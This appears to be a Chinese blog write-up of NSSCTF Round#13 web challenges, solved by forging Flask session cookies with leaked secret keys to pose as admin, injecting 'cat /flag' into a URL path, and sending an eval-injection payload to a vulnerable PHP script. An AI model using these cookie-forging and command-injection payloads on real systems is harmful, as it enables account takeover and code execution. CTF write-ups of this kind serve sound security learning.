NSSCTF Round#13 WEB

已于 2024-03-05 19:23:27 修改
阅读量344 收藏 5
点赞数 10
分类专栏: CTF 文章标签: CTF WEB
于 2024-03-04 23:15:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136464884
版权

1.flask?jwt?

在忘记密码下面有提示secretkey,那么就可以jwt伪造

自己注册个账号然后登录

点击拿flag提示你不是admin,并且cookie里面有个session,用工具解密一下

python flask_session_cookie_manager3.py decode  -s 'th3f1askisfunny'  -c '.eJwlzjsOAyEMANG7UKcA2xi8l1mBP0paNltFuXuQ0r-R5pPOWH490_Fetz_S-bJ0JIXIZgYS0zS0VRyMbUbhKVwFKVhhcPUJ1kOjBioORTIZyKOI1UbkgzYR7L3l1oDYijBOIGeMgsUkByHYFq6eS-UutFvwtEfuy9f_BtL3BxRVLzE.ZeXYGA.PCLZkIezGFKXh55D8kvbdbiwmX0'

里面有个_user_id为2,那么猜测admin为1

修改成1再用工具伪造

python flask_session_cookie_manager3.py encode -s 'th3f1askisfunny' -t "{'_fresh': True, '_id': 'c2f0ddd29fbdcfc753a637bf16b965934f6c2a65eb2d8fcf5f3c3ac34d9a36a19d5744ea465e93887077246d1963b24e63f131d90f432d938ece015689419d2e', '_user_id': '1'}"

直接拿到flag

2.ez_factors

点击tool跳转到/114514

2*31*1847正好是114514,说明114514被进行了因数分解,那么url中的114514就可能命令执行

改成114514;cat /flag有数字生成,说明只能生成数字没有字母

od命令可以将数据以八进制数字输出

-b参数是以8进制输出

3.flask?jwt?(hard)

这次源码里面没了secretkey

先解析一下jwt看看是什么

比上次多加了时间

在源码里看到了一些东西

去/wor看一下

有时间,把这个路由下面的session随便改一下然后报错了。。。并且里面有key

hardgam3_C0u1d_u_f1ndM3????

伪造一下

为了不报错,我把时间那块删除了

python flask_session_cookie_manager3.py encode -s "hardgam3_C0u1d_u_f1ndM3????" -t "{'_fresh':True,'_id':'c2f0ddd29fbdcfc753a637bf16b965934f6c2a65eb2d8fcf5f3c3ac34d9a36a19d5744ea465e93887077246d1963b24e63f131d90f432d938ece015689419d2e','_user_id':'1'}"
.eJwlzjsOAyEMANG7UKcA2xi8l1mBP0paNltFuXuQ0r-R5pPOWH490_Fetz_S-bJ0JIXIZgYS0zS0VRyMbUbhKVwFKVhhcPUJ1kOjBioORTIZyKOI1UbkgzYR7L3l1oDYijBOIGeMgsUkByHYFq6eS-UutFvwtEfuy9f_pqTvDxRSLzA.ZeXkbQ.dk4CXwGdna3N9weB2RgSXMBm8gw

 4.MyWeb

 <?php
error_reporting(E_ALL);
// 写了个网页存储JSON数据,但是还不会处理json格式,这样处理应该没有什么问题吧

if ($_GET['mode'] == 'save') {
    $data = file_get_contents('/tmp/data.json');
    $value = addslashes($_GET['value']);
    $data = str_replace(']', ", '$value']", $data);
    file_put_contents('/tmp/data.json', $data);
} else if ($_GET['mode'] == 'read') {
    $data = file_get_contents('/tmp/data.json');
    eval('$data = ' . $data . ';');
    print_r($data);
} else {
    highlight_file(__FILE__);
}

如果mode传参为save,把data储存再/tmp/data/json文件里,data的处理方式是先用addslashes处理,然后再把]替换成,'$value'].

如果mode传参为read,读取/tmp/data.json文件

然后eval执行data,并把结果赋给$data

假设原来data.json为[1,2,3],添加一个value值为4,data.json变为[1,2,3,'4']

如果能把后面的]注释掉,就可以插入命令

[1,2,3,'];echo `cat /flag`;//'],如果能变成这样,就能执行 cat /flag的指令

那么传入的value值就应该是];echo `cat /flag`;//

这样也不会触发addslashes函数

http://node4.anna.nssctf.cn:28017/?mode=save&value=];echo%20`cat%20/flag`;//

执行失败

擦,看了别人的wp,思路跟我一样啊,没复现出来有点奇怪,应该靶机的问题。

tao0845
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Codeforces Round #723 (Div. 2).md
10-13
Codeforces Round #723 (Div. 2).md
Codeforces Round #479 (Div. 3) E. Cyclic Components
01-03
E. Cyclic Components 题目链接-E. Cyclic Components 题目大意 给你nnn个点和mmm条边,求所构成图中单圈环的个数 ...并查集并查集并查集 很明显单圈环每个点的度都为222,所以我们可以用数组cnt[]记录每个点的度,...
NSSCTF Round#17 RE snake WP
Pisces50002的博客
01-28 503
F8慢慢往下走,第二个cmp,为了防止它跳转回去,把ZF改成1直接往下走(jnz指令表示“当零标志位(ZF)为0时跳转”)联系到朝雾老师教的打飞机hit-plane那一题,应该通过控制流劫持直接跳转到打印flag的地方。之后可以看到fmt_Fprintf应该是打印flag的位置,下个断点直接F9。控制流劫持可以非常快,当时困在中间的循环里了,其实一直跳到最后就行……第一个cmp分支处,判断轮数,我选择直接改rax的值。一路F8,这里打印了个success!运行一下发现是个贪吃蛇。
WebNSSCTF Round#17 Basic个人wp(全)
uuzeray的博客
01-28 1336
题目作为小练手还行,具体细节不必较劲。
NSSCTF Round#7部分wp
v2ish1yan的博客
01-29 932
阿巴阿巴
NSSCTF Round#18 Basic——Number 7
ASD830的博客
02-14 350
题目描述:一眼丁真,Cisco Type7解码。
WebNSSCTF Round#18 Basic个人wp(部分)
uuzeray的博客
02-14 1526
不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可。我们就按示例传一下(必须以http://开头,否则不能解析为图片)尝试传了发现不能起作用跳转,估计是这些被html实体化了。链接是插入到了src中,我们可以直接用">闭合img标签。从评论区知道,要让门酱玩元梦之星,考虑直接。那咋整呢,题目里还提供了评论插入图片功能。把这个链接给门酱即可获得flag。成功重定向到元梦之星官网。先试一下随便给个链接。获得该条恶意评论链接。
[NSSCTF Round #13]web专项赛wp
Leaf_initial的博客
07-05 955
属性,所以猜测这个时间是从session中读取,随意修改session查看报错,可以在这查到。我们自然是没有账号密码的,这里一开始尝试sql注入但是提示账号密码错误,所以换个思路。Ctrl+F以下,查找那三个模块,显示已经开始,那就可以开始按照文章来打,进行。了,那就去尝试session伪造,我们先得到现在的session。是一个超链接,点击之后跳转界面,根据题目描述,得知这里使用了。后的界面,把伪造好的session放进去,得到flag。先用dirsearch扫一下,ok,啥也没有,换个思路。
NSSCTF Round#18 RE GenshinWishSimulator WP
Pisces50002的博客
02-14 707
恶搞原神抽卡模拟器Unity逆向,根据经验应该dnspy查看Assembly-CSharp.dll上来看到SM4Gacha是抽卡的意思,这里应该是抽卡的主逻辑Gift内可以看到主要逻辑,以array作为key为偏移(IV),用模式加密input数组,最后保存字符串到flag对象里也就是说如果静态分析直接求flag就是一个SM4_CBC的解密过程,检查一下发现SM4没有经过魔改,应该容易解出。
NSSCTF Round#1 Basic [nss2022年4月3日个人赛]web的题解
weixin_51458899的博客
04-04 2441
[nss个人赛]basic_check(复现) (83条消息) Nikto安装和使用_半砖的博客-CSDN博客_nikto安装 参考:https://blog.51cto.com/dearch/2053703 单纯复现比较简单 [nssctf个人赛]sql_for_sql 站点功能是: 登录 注册 改密码 登录和注册均没有注入点 考虑改密码的时候会二次注入 结果的确发现了异常,无论是用户名一开始注册的时候加了单引号,还是新密码用了单引号,状态码会报500, 推测改密码的后台sql select p
NSSCTF Round#20 Basic(WEB方向)
Zue3r的博客
03-31 1429
NSSCTF Round#20 Basic(WEB方向)
Codeforces Round #627 (Div. 3) B. Yet Another Palindrome Problem
01-03
传送门 题意: 一个长度为n的数组,为删除一些数后,剩下的数能否构成长度大于3的回文数组 思路: 只要能找到两个相等的数,且他们的间距大于2即可 o(n^2)的暴力就能过 比赛时写了一个o(n)的 就是把所有相等的数放到...
Codeforces Round #627 (Div. 3) C. Frog Jumps(思维)
01-20
传送门 题意: 开始位置在0,问能否跳到n+1位置 每步只能跳d 在1——n每个位置有方向,L,R,求d的最小值 思路: 只用找相邻两个R之间的最大值即可 代码: #include #include ...typedef long long l
Codeforces Round #629 (Div. 3) B. K-th Beautiful String
01-03
B. K-th Beautiful String 题目链接-B. K-th Beautiful String 题目大意 长度为n的字符串包含n−2n−2n−2个aaa和222个bbb,求按照字典序排列输出第kkk个字符串 解题思路 第一个bbb在倒数第二位有1个字符串,在...
###对华为OD分布式操作系统的详细介绍
05-22
华为OD
2110220116吴骏博.py
最新发布
05-22
2110220116吴骏博.py
基于Java的ApplicationPower快速项目生成脚手架设计源码
05-22
ApplicationPower项目生成脚手架设计源码:该项目基于Java开发,包含284个文件,主要使用Java和Shell语言。ApplicationPower是一个快速的项目生成脚手架,旨在帮助开发者快速搭建项目框架,包括创建项目结构、配置文件、开发环境等,提高开发效率。
基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar
05-22
CSDN IT狂飙上传的代码均可运行,功能ok的情况下才上传的,直接替换数据即可使用,小白也能轻松上手 【资源说明】 基于MATLAB实现的OFDM经典同步算法之一Park算法仿真,附带Park算法经典文献+代码文档+使用说明文档.rar 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2020b;若运行有误,根据提示GPT修改;若不会,私信博主(问题描述要详细); 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可后台私信博主; 4.1 期刊或参考文献复现 4.2 Matlab程序定制 4.3 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 5、欢迎下载,沟通交流,互相学习,共同进步!
codeforces round #729
03-16
Codeforces Round #729 是 Codeforces 的一个比赛,于2021年8月29日举行。这是一个由 Codeforces 组织的在线编程竞赛,参赛者需要在规定时间内解决一系列算法问题。比赛难度分为 A、B、C、D、E、F 六个等级,参赛者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值